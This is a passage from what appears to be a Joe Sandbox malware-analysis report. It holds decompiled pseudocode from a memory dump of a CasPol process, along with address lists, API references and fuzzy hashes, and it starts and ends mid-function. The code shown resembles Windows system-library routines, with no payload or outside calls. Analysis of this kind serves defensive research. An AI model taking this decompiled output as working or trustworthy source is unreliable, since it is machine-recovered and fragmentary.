						}
						if( *_t73 != 0) {
							_t105 = _v40;
							L017F8F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = L0176AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x1818628; // 0x0
								_v68 = _t77;
								_t78 =  *0x181862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x1818628; // 0x0
							_t116 =  *0x181862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                                                                                                                                                                                                                                                                                                							_t88 = _t102 - _t91;
                                                                                                                                                                                                                                                                                                							asm("sbb edx, edi");
                                                                                                                                                                                                                                                                                                							_t108 = _t105;
                                                                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                                                                							_t88 = 0;
                                                                                                                                                                                                                                                                                                							_t108 = 0;
                                                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                                                						goto L16;
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                                                                					if( *(_t112 + 0x44) == _t60) {
                                                                                                                                                                                                                                                                                                						goto L20;
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                					goto L3;
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                			}
















































                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0174bb26
                                                                                                                                                                                                                                                                                                0x0174bb26
                                                                                                                                                                                                                                                                                                0x0174ba1e
                                                                                                                                                                                                                                                                                                0x0174ba1e
                                                                                                                                                                                                                                                                                                0x0174ba23
                                                                                                                                                                                                                                                                                                0x0174ba25
                                                                                                                                                                                                                                                                                                0x0174ba2c
                                                                                                                                                                                                                                                                                                0x0174ba30
                                                                                                                                                                                                                                                                                                0x0174ba35
                                                                                                                                                                                                                                                                                                0x0174ba35
                                                                                                                                                                                                                                                                                                0x0174ba41
                                                                                                                                                                                                                                                                                                0x0174ba46
                                                                                                                                                                                                                                                                                                0x0174ba4c
                                                                                                                                                                                                                                                                                                0x0174ba50
                                                                                                                                                                                                                                                                                                0x0174ba54
                                                                                                                                                                                                                                                                                                0x0174ba6a
                                                                                                                                                                                                                                                                                                0x0174ba6e
                                                                                                                                                                                                                                                                                                0x0174ba70
                                                                                                                                                                                                                                                                                                0x0174ba74
                                                                                                                                                                                                                                                                                                0x0174ba78
                                                                                                                                                                                                                                                                                                0x0174ba7a
                                                                                                                                                                                                                                                                                                0x0174ba7c
                                                                                                                                                                                                                                                                                                0x0174ba8e
                                                                                                                                                                                                                                                                                                0x0174ba90
                                                                                                                                                                                                                                                                                                0x0174ba92
                                                                                                                                                                                                                                                                                                0x0174bb14
                                                                                                                                                                                                                                                                                                0x0174bb14
                                                                                                                                                                                                                                                                                                0x0174bb16
                                                                                                                                                                                                                                                                                                0x0174bb16
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0174ba7c
                                                                                                                                                                                                                                                                                                0x0174bb0a
                                                                                                                                                                                                                                                                                                0x0174bb0d
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0174bb0f

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0174B9A5
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 885266447-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 51696491c7097b5ae30c70bda5c605a3580586087bea52467c128d767f4380fe
                                                                                                                                                                                                                                                                                                • Instruction ID: 81c8c00892bdb960f099ba5b1eb1243e4874fbb1178bdf5aa9d2f9424b28f5f4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 51696491c7097b5ae30c70bda5c605a3580586087bea52467c128d767f4380fe
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 46514671A08341CFC720DF68C48492AFBF9FB88600F14896EEA9597359D730ED44CB92
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                C-Code - Quality: 80%
                                                                                                                                                                                                                                                                                                			E0175FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
                                                                                                                                                                                                                                                                                                				char _v5;
                                                                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                                                                				signed int _v12;
                                                                                                                                                                                                                                                                                                				char _v16;
                                                                                                                                                                                                                                                                                                				char _v17;
                                                                                                                                                                                                                                                                                                				char _v20;
                                                                                                                                                                                                                                                                                                				signed int _v24;
                                                                                                                                                                                                                                                                                                				char _v28;
                                                                                                                                                                                                                                                                                                				char _v32;
                                                                                                                                                                                                                                                                                                				signed int _v40;
                                                                                                                                                                                                                                                                                                				void* __ecx;
                                                                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                                                                				void* __ebp;
                                                                                                                                                                                                                                                                                                				signed int _t73;
                                                                                                                                                                                                                                                                                                				intOrPtr* _t75;
                                                                                                                                                                                                                                                                                                				signed int _t77;
                                                                                                                                                                                                                                                                                                				signed int _t79;
                                                                                                                                                                                                                                                                                                				signed int _t81;
                                                                                                                                                                                                                                                                                                				intOrPtr _t83;
                                                                                                                                                                                                                                                                                                				intOrPtr _t85;
                                                                                                                                                                                                                                                                                                				intOrPtr _t86;
                                                                                                                                                                                                                                                                                                				signed int _t91;
                                                                                                                                                                                                                                                                                                				signed int _t94;
                                                                                                                                                                                                                                                                                                				signed int _t95;
                                                                                                                                                                                                                                                                                                				signed int _t96;
                                                                                                                                                                                                                                                                                                				signed int _t106;
                                                                                                                                                                                                                                                                                                				signed int _t108;
                                                                                                                                                                                                                                                                                                				signed int _t114;
                                                                                                                                                                                                                                                                                                				signed int _t116;
                                                                                                                                                                                                                                                                                                				signed int _t118;
                                                                                                                                                                                                                                                                                                				signed int _t122;
                                                                                                                                                                                                                                                                                                				signed int _t123;
                                                                                                                                                                                                                                                                                                				void* _t129;
                                                                                                                                                                                                                                                                                                				signed int _t130;
                                                                                                                                                                                                                                                                                                				void* _t132;
                                                                                                                                                                                                                                                                                                				intOrPtr* _t134;
                                                                                                                                                                                                                                                                                                				signed int _t138;
                                                                                                                                                                                                                                                                                                				signed int _t141;
                                                                                                                                                                                                                                                                                                				signed int _t147;
                                                                                                                                                                                                                                                                                                				intOrPtr _t153;
                                                                                                                                                                                                                                                                                                				signed int _t154;
                                                                                                                                                                                                                                                                                                				signed int _t155;
                                                                                                                                                                                                                                                                                                				signed int _t170;
                                                                                                                                                                                                                                                                                                				void* _t174;
                                                                                                                                                                                                                                                                                                				signed int _t176;
                                                                                                                                                                                                                                                                                                				signed int _t177;
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				_t129 = __ebx;
                                                                                                                                                                                                                                                                                                				_push(_t132);
                                                                                                                                                                                                                                                                                                				_push(__esi);
                                                                                                                                                                                                                                                                                                				_t174 = _t132;
                                                                                                                                                                                                                                                                                                				_t73 =  !( *( *(_t174 + 0x18)));
                                                                                                                                                                                                                                                                                                				if(_t73 >= 0) {
                                                                                                                                                                                                                                                                                                					L5:
                                                                                                                                                                                                                                                                                                					return _t73;
                                                                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                                                                					L0173EEF0(0x1817b60);
                                                                                                                                                                                                                                                                                                					_t134 =  *0x1817b84; // 0x77e47b80
                                                                                                                                                                                                                                                                                                					_t2 = _t174 + 0x24; // 0x24
                                                                                                                                                                                                                                                                                                					_t75 = _t2;
                                                                                                                                                                                                                                                                                                					if( *_t134 != 0x1817b80) {
                                                                                                                                                                                                                                                                                                						_push(3);
                                                                                                                                                                                                                                                                                                						asm("int 0x29");
                                                                                                                                                                                                                                                                                                						asm("int3");
                                                                                                                                                                                                                                                                                                						asm("int3");
                                                                                                                                                                                                                                                                                                						asm("int3");
                                                                                                                                                                                                                                                                                                						asm("int3");
                                                                                                                                                                                                                                                                                                						asm("int3");
                                                                                                                                                                                                                                                                                                						asm("int3");
                                                                                                                                                                                                                                                                                                						asm("int3");
                                                                                                                                                                                                                                                                                                						asm("int3");
                                                                                                                                                                                                                                                                                                						asm("int3");
                                                                                                                                                                                                                                                                                                						asm("int3");
                                                                                                                                                                                                                                                                                                						asm("int3");
                                                                                                                                                                                                                                                                                                						asm("int3");
                                                                                                                                                                                                                                                                                                						asm("int3");
                                                                                                                                                                                                                                                                                                						asm("int3");
                                                                                                                                                                                                                                                                                                						asm("int3");
                                                                                                                                                                                                                                                                                                						asm("int3");
                                                                                                                                                                                                                                                                                                						asm("int3");
                                                                                                                                                                                                                                                                                                						asm("int3");
                                                                                                                                                                                                                                                                                                						asm("int3");
                                                                                                                                                                                                                                                                                                						_push(0x1817b60);
                                                                                                                                                                                                                                                                                                						_t170 = _v8;
                                                                                                                                                                                                                                                                                                						_v28 = 0;
                                                                                                                                                                                                                                                                                                						_v40 = 0;
                                                                                                                                                                                                                                                                                                						_v24 = 0;
                                                                                                                                                                                                                                                                                                						_v17 = 0;
                                                                                                                                                                                                                                                                                                						_v32 = 0;
                                                                                                                                                                                                                                                                                                						__eflags = _t170 & 0xffff7cf2;
                                                                                                                                                                                                                                                                                                						if((_t170 & 0xffff7cf2) != 0) {
                                                                                                                                                                                                                                                                                                							L43:
                                                                                                                                                                                                                                                                                                							_t77 = 0xc000000d;
                                                                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                                                                							_t79 = _t170 & 0x0000000c;
                                                                                                                                                                                                                                                                                                							__eflags = _t79;
                                                                                                                                                                                                                                                                                                							if(_t79 != 0) {
                                                                                                                                                                                                                                                                                                								__eflags = _t79 - 0xc;
                                                                                                                                                                                                                                                                                                								if(_t79 == 0xc) {
                                                                                                                                                                                                                                                                                                									goto L43;
                                                                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                                                                									goto L9;
                                                                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                                                                								_t170 = _t170 | 0x00000008;
                                                                                                                                                                                                                                                                                                								__eflags = _t170;
                                                                                                                                                                                                                                                                                                								L9:
                                                                                                                                                                                                                                                                                                								_t81 = _t170 & 0x00000300;
                                                                                                                                                                                                                                                                                                								__eflags = _t81 - 0x300;
                                                                                                                                                                                                                                                                                                								if(_t81 == 0x300) {
                                                                                                                                                                                                                                                                                                									goto L43;
                                                                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                                                                									_t138 = _t170 & 0x00000001;
                                                                                                                                                                                                                                                                                                									__eflags = _t138;
                                                                                                                                                                                                                                                                                                									_v24 = _t138;
                                                                                                                                                                                                                                                                                                									if(_t138 != 0) {
                                                                                                                                                                                                                                                                                                										__eflags = _t81;
                                                                                                                                                                                                                                                                                                										if(_t81 != 0) {
                                                                                                                                                                                                                                                                                                											goto L43;
                                                                                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                                                                                											goto L11;
                                                                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                                                                                										L11:
                                                                                                                                                                                                                                                                                                										_push(_t129);
                                                                                                                                                                                                                                                                                                										_t77 = L01736D90( &_v20);
                                                                                                                                                                                                                                                                                                										_t130 = _t77;
                                                                                                                                                                                                                                                                                                										__eflags = _t130;
                                                                                                                                                                                                                                                                                                										if(_t130 >= 0) {
                                                                                                                                                                                                                                                                                                											_push(_t174);
                                                                                                                                                                                                                                                                                                											__eflags = _t170 & 0x00000301;
                                                                                                                                                                                                                                                                                                											if((_t170 & 0x00000301) == 0) {
                                                                                                                                                                                                                                                                                                												_t176 = _a8;
                                                                                                                                                                                                                                                                                                												__eflags = _t176;
                                                                                                                                                                                                                                                                                                												if(__eflags == 0) {
                                                                                                                                                                                                                                                                                                													L64:
                                                                                                                                                                                                                                                                                                													_t83 =  *[fs:0x18];
                                                                                                                                                                                                                                                                                                													_t177 = 0;
                                                                                                                                                                                                                                                                                                													__eflags =  *(_t83 + 0xfb8);
                                                                                                                                                                                                                                                                                                													if( *(_t83 + 0xfb8) != 0) {
                                                                                                                                                                                                                                                                                                														L017376E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
                                                                                                                                                                                                                                                                                                														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
                                                                                                                                                                                                                                                                                                													}
                                                                                                                                                                                                                                                                                                													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
                                                                                                                                                                                                                                                                                                													goto L15;
                                                                                                                                                                                                                                                                                                												} else {
                                                                                                                                                                                                                                                                                                													asm("sbb edx, edx");
                                                                                                                                                                                                                                                                                                													_t114 = E017C8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
                                                                                                                                                                                                                                                                                                													__eflags = _t114;
                                                                                                                                                                                                                                                                                                													if(_t114 < 0) {
                                                                                                                                                                                                                                                                                                														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
                                                                                                                                                                                                                                                                                                														E0172B150();
                                                                                                                                                                                                                                                                                                													}
                                                                                                                                                                                                                                                                                                													_t116 = L017C6D81(_t176,  &_v16);
                                                                                                                                                                                                                                                                                                													__eflags = _t116;
                                                                                                                                                                                                                                                                                                													if(_t116 >= 0) {
                                                                                                                                                                                                                                                                                                														__eflags = _v16 - 2;
                                                                                                                                                                                                                                                                                                														if(_v16 < 2) {
                                                                                                                                                                                                                                                                                                															L56:
                                                                                                                                                                                                                                                                                                															_t118 = L017375CE(_v20, 5, 0);
                                                                                                                                                                                                                                                                                                															__eflags = _t118;
                                                                                                                                                                                                                                                                                                															if(_t118 < 0) {
                                                                                                                                                                                                                                                                                                																L67:
                                                                                                                                                                                                                                                                                                																_t130 = 0xc0000017;
                                                                                                                                                                                                                                                                                                																goto L32;
                                                                                                                                                                                                                                                                                                															} else {
                                                                                                                                                                                                                                                                                                																__eflags = _v12;
                                                                                                                                                                                                                                                                                                																if(_v12 == 0) {
                                                                                                                                                                                                                                                                                                																	goto L67;
                                                                                                                                                                                                                                                                                                																} else {
                                                                                                                                                                                                                                                                                                																	_t153 =  *0x1818638; // 0x0
                                                                                                                                                                                                                                                                                                																	_t122 = L017338A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
                                                                                                                                                                                                                                                                                                																	_t154 = _v12;
                                                                                                                                                                                                                                                                                                																	_t130 = _t122;
                                                                                                                                                                                                                                                                                                																	__eflags = _t130;
                                                                                                                                                                                                                                                                                                																	if(_t130 >= 0) {
                                                                                                                                                                                                                                                                                                																		_t123 =  *(_t154 + 4) & 0x0000ffff;
                                                                                                                                                                                                                                                                                                																		__eflags = _t123;
                                                                                                                                                                                                                                                                                                																		if(_t123 != 0) {
                                                                                                                                                                                                                                                                                                																			_t155 = _a12;
                                                                                                                                                                                                                                                                                                																			__eflags = _t155;
                                                                                                                                                                                                                                                                                                																			if(_t155 != 0) {
                                                                                                                                                                                                                                                                                                																				 *_t155 = _t123;
                                                                                                                                                                                                                                                                                                																			}
                                                                                                                                                                                                                                                                                                																			goto L64;
                                                                                                                                                                                                                                                                                                																		} else {
                                                                                                                                                                                                                                                                                                																			L017376E2(_t154);
                                                                                                                                                                                                                                                                                                																			goto L41;
                                                                                                                                                                                                                                                                                                																		}
                                                                                                                                                                                                                                                                                                																	} else {
                                                                                                                                                                                                                                                                                                																		L017376E2(_t154);
                                                                                                                                                                                                                                                                                                																		_t177 = 0;
                                                                                                                                                                                                                                                                                                																		goto L18;
                                                                                                                                                                                                                                                                                                																	}
                                                                                                                                                                                                                                                                                                																}
                                                                                                                                                                                                                                                                                                															}
                                                                                                                                                                                                                                                                                                														} else {
                                                                                                                                                                                                                                                                                                															__eflags =  *_t176;
                                                                                                                                                                                                                                                                                                															if( *_t176 != 0) {
                                                                                                                                                                                                                                                                                                																goto L56;
                                                                                                                                                                                                                                                                                                															} else {
                                                                                                                                                                                                                                                                                                																__eflags =  *(_t176 + 2);
                                                                                                                                                                                                                                                                                                																if( *(_t176 + 2) == 0) {
                                                                                                                                                                                                                                                                                                																	goto L64;
                                                                                                                                                                                                                                                                                                																} else {
                                                                                                                                                                                                                                                                                                																	goto L56;
                                                                                                                                                                                                                                                                                                																}
                                                                                                                                                                                                                                                                                                															}
                                                                                                                                                                                                                                                                                                														}
                                                                                                                                                                                                                                                                                                													} else {
                                                                                                                                                                                                                                                                                                														_t130 = 0xc000000d;
                                                                                                                                                                                                                                                                                                														goto L32;
                                                                                                                                                                                                                                                                                                													}
                                                                                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                                                                                												goto L35;
                                                                                                                                                                                                                                                                                                											} else {
                                                                                                                                                                                                                                                                                                												__eflags = _a8;
                                                                                                                                                                                                                                                                                                												if(_a8 != 0) {
                                                                                                                                                                                                                                                                                                													_t77 = 0xc000000d;
                                                                                                                                                                                                                                                                                                												} else {
                                                                                                                                                                                                                                                                                                													_v5 = 1;
                                                                                                                                                                                                                                                                                                													L0175FCE3(_v20, _t170);
                                                                                                                                                                                                                                                                                                													_t177 = 0;
                                                                                                                                                                                                                                                                                                													__eflags = 0;
                                                                                                                                                                                                                                                                                                													L15:
                                                                                                                                                                                                                                                                                                													_t85 =  *[fs:0x18];
                                                                                                                                                                                                                                                                                                													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
                                                                                                                                                                                                                                                                                                													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
                                                                                                                                                                                                                                                                                                														L18:
                                                                                                                                                                                                                                                                                                														__eflags = _t130;
                                                                                                                                                                                                                                                                                                														if(_t130 != 0) {
                                                                                                                                                                                                                                                                                                															goto L32;
                                                                                                                                                                                                                                                                                                														} else {
                                                                                                                                                                                                                                                                                                															__eflags = _v5 - _t130;
                                                                                                                                                                                                                                                                                                															if(_v5 == _t130) {
                                                                                                                                                                                                                                                                                                																goto L32;
                                                                                                                                                                                                                                                                                                															} else {
			_t86 =  *[fs:0x18];
			__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
			if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
				_t177 =  *( *( *[fs:0x18] + 0xfbc));
			}
			__eflags = _t177;
			if(_t177 == 0) {
				L31:
				__eflags = 0;
				L017370F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
				goto L32;
			} else {
				__eflags = _v24;
				_t91 =  *(_t177 + 0x20);
				if(_v24 != 0) {
					 *(_t177 + 0x20) = _t91 & 0xfffffff9;
					goto L31;
				} else {
					_t141 = _t91 & 0x00000040;
					__eflags = _t170 & 0x00000100;
					if((_t170 & 0x00000100) == 0) {
						__eflags = _t141;
						if(_t141 == 0) {
							L74:
							_t94 = _t91 & 0xfffffffd | 0x00000004;
							goto L27;
						} else {
							_t177 = L0175FD22(_t177);
							__eflags = _t177;
							if(_t177 == 0) {
								goto L42;
							} else {
								_t130 = L0175FD9B(_t177, 0, 4);
								__eflags = _t130;
								if(_t130 != 0) {
									goto L42;
								} else {
									_t68 = _t177 + 0x20;
									 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
									__eflags =  *_t68;
									_t91 =  *(_t177 + 0x20);
									goto L74;
								}
							}
						}
						goto L35;
					} else {
						__eflags = _t141;
						if(_t141 != 0) {
							_t177 = L0175FD22(_t177);
							__eflags = _t177;
							if(_t177 == 0) {
								L42:
								_t77 = 0xc0000001;
								goto L33;
							} else {
								_t130 = L0175FD9B(_t177, 0, 4);
								__eflags = _t130;
								if(_t130 != 0) {
									goto L42;
								} else {
									 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
									_t91 =  *(_t177 + 0x20);
									goto L26;
								}
							}
							goto L35;
						} else {
							L26:
							_t94 = _t91 & 0xfffffffb | 0x00000002;
							__eflags = _t94;
							L27:
							 *(_t177 + 0x20) = _t94;
							__eflags = _t170 & 0x00008000;
							if((_t170 & 0x00008000) != 0) {
								_t95 = _a12;
								__eflags = _t95;
								if(_t95 != 0) {
									_t96 =  *_t95;
									__eflags = _t96;
									if(_t96 != 0) {
										 *((short*)(_t177 + 0x22)) = 0;
										_t40 = _t177 + 0x20;
										 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
										__eflags =  *_t40;
									}
								}
							}
							goto L31;
						}
					}
				}
			}
		}
	}
} else {
	_t147 =  *( *[fs:0x18] + 0xfc0);
	_t106 =  *(_t147 + 0x20);
	__eflags = _t106 & 0x00000040;
	if((_t106 & 0x00000040) != 0) {
		_t147 = L0175FD22(_t147);
		__eflags = _t147;
		if(_t147 == 0) {
			L41:
			_t130 = 0xc0000001;
			L32:
			_t77 = _t130;
			goto L33;
		} else {
			 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
			_t106 =  *(_t147 + 0x20);
			goto L17;
		}
                                                                                                                                                                                                                                                                                                															goto L35;
                                                                                                                                                                                                                                                                                                														} else {
                                                                                                                                                                                                                                                                                                															L17:
                                                                                                                                                                                                                                                                                                															_t108 = _t106 | 0x00000080;
                                                                                                                                                                                                                                                                                                															__eflags = _t108;
                                                                                                                                                                                                                                                                                                															 *(_t147 + 0x20) = _t108;
                                                                                                                                                                                                                                                                                                															 *( *[fs:0x18] + 0xfc0) = _t147;
                                                                                                                                                                                                                                                                                                															goto L18;
                                                                                                                                                                                                                                                                                                														}
                                                                                                                                                                                                                                                                                                													}
                                                                                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                                                                											L33:
                                                                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                                                						L35:
                                                                                                                                                                                                                                                                                                						return _t77;
                                                                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                                                                						 *_t75 = 0x1817b80;
                                                                                                                                                                                                                                                                                                						 *((intOrPtr*)(_t75 + 4)) = _t134;
                                                                                                                                                                                                                                                                                                						 *_t134 = _t75;
                                                                                                                                                                                                                                                                                                						 *0x1817b84 = _t75;
                                                                                                                                                                                                                                                                                                						_t73 = E0173EB70(_t134, 0x1817b60);
                                                                                                                                                                                                                                                                                                						if( *0x1817b20 != 0) {
                                                                                                                                                                                                                                                                                                							_t73 =  *( *[fs:0x30] + 0xc);
                                                                                                                                                                                                                                                                                                							if( *((char*)(_t73 + 0x28)) == 0) {
                                                                                                                                                                                                                                                                                                								_t73 = L0173FF60( *0x1817b20);
                                                                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                                                						goto L5;
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                			}

                                                                                                                                                                                                                                                                                                0x0179bde1
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0179bde3
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0179bde3
                                                                                                                                                                                                                                                                                                0x0175fb86
                                                                                                                                                                                                                                                                                                0x0175fb86
                                                                                                                                                                                                                                                                                                0x0175fb86
                                                                                                                                                                                                                                                                                                0x0175fb8b
                                                                                                                                                                                                                                                                                                0x0175fb90
                                                                                                                                                                                                                                                                                                0x0175fb92
                                                                                                                                                                                                                                                                                                0x0175fb94
                                                                                                                                                                                                                                                                                                0x0175fb9a
                                                                                                                                                                                                                                                                                                0x0175fb9b
                                                                                                                                                                                                                                                                                                0x0175fba1
                                                                                                                                                                                                                                                                                                0x0179bde8
                                                                                                                                                                                                                                                                                                0x0179bdeb
                                                                                                                                                                                                                                                                                                0x0179bded
                                                                                                                                                                                                                                                                                                0x0179beb5
                                                                                                                                                                                                                                                                                                0x0179beb5
                                                                                                                                                                                                                                                                                                0x0179bebb
                                                                                                                                                                                                                                                                                                0x0179bebd
                                                                                                                                                                                                                                                                                                0x0179bec3
                                                                                                                                                                                                                                                                                                0x0179bed2
                                                                                                                                                                                                                                                                                                0x0179bedd
                                                                                                                                                                                                                                                                                                0x0179bedd
                                                                                                                                                                                                                                                                                                0x0179beed
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0179bdf3
                                                                                                                                                                                                                                                                                                0x0179bdfe
                                                                                                                                                                                                                                                                                                0x0179be06
                                                                                                                                                                                                                                                                                                0x0179be0b
                                                                                                                                                                                                                                                                                                0x0179be0d
                                                                                                                                                                                                                                                                                                0x0179be0f
                                                                                                                                                                                                                                                                                                0x0179be14
                                                                                                                                                                                                                                                                                                0x0179be19
                                                                                                                                                                                                                                                                                                0x0179be20
                                                                                                                                                                                                                                                                                                0x0179be25
                                                                                                                                                                                                                                                                                                0x0179be27
                                                                                                                                                                                                                                                                                                0x0179be35
                                                                                                                                                                                                                                                                                                0x0179be39
                                                                                                                                                                                                                                                                                                0x0179be46
                                                                                                                                                                                                                                                                                                0x0179be4f
                                                                                                                                                                                                                                                                                                0x0179be54
                                                                                                                                                                                                                                                                                                0x0179be56
                                                                                                                                                                                                                                                                                                0x0179bef8
                                                                                                                                                                                                                                                                                                0x0179bef8
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0179be5c
                                                                                                                                                                                                                                                                                                0x0179be5c
                                                                                                                                                                                                                                                                                                0x0179be60
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0179be66
                                                                                                                                                                                                                                                                                                0x0179be66
                                                                                                                                                                                                                                                                                                0x0179be7f
                                                                                                                                                                                                                                                                                                0x0179be84
                                                                                                                                                                                                                                                                                                0x0179be87
                                                                                                                                                                                                                                                                                                0x0179be89
                                                                                                                                                                                                                                                                                                0x0179be8b
                                                                                                                                                                                                                                                                                                0x0179be99
                                                                                                                                                                                                                                                                                                0x0179be9d
                                                                                                                                                                                                                                                                                                0x0179bea0
                                                                                                                                                                                                                                                                                                0x0179beac
                                                                                                                                                                                                                                                                                                0x0179beaf
                                                                                                                                                                                                                                                                                                0x0179beb1
                                                                                                                                                                                                                                                                                                0x0179beb3
                                                                                                                                                                                                                                                                                                0x0179beb3
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0179bea2
                                                                                                                                                                                                                                                                                                0x0179bea2
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0179bea2
                                                                                                                                                                                                                                                                                                0x0179be8d
                                                                                                                                                                                                                                                                                                0x0179be8d
                                                                                                                                                                                                                                                                                                0x0179be92
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0179be92
                                                                                                                                                                                                                                                                                                0x0179be8b
                                                                                                                                                                                                                                                                                                0x0179be60
                                                                                                                                                                                                                                                                                                0x0179be3b
                                                                                                                                                                                                                                                                                                0x0179be3b
                                                                                                                                                                                                                                                                                                0x0179be3e
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0179be40
                                                                                                                                                                                                                                                                                                0x0179be40
                                                                                                                                                                                                                                                                                                0x0179be44
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0179be44
                                                                                                                                                                                                                                                                                                0x0179be3e
                                                                                                                                                                                                                                                                                                0x0179be29
                                                                                                                                                                                                                                                                                                0x0179be29
                                                                                                                                                                                                                                                                                                0x0175fbd3
                                                                                                                                                                                                                                                                                                0x0175fbd9
                                                                                                                                                                                                                                                                                                0x0175fbdc
                                                                                                                                                                                                                                                                                                0x0175fbde
                                                                                                                                                                                                                                                                                                0x0175fc99
                                                                                                                                                                                                                                                                                                0x0175fc9b
                                                                                                                                                                                                                                                                                                0x0175fc9d
                                                                                                                                                                                                                                                                                                0x0175fcd5
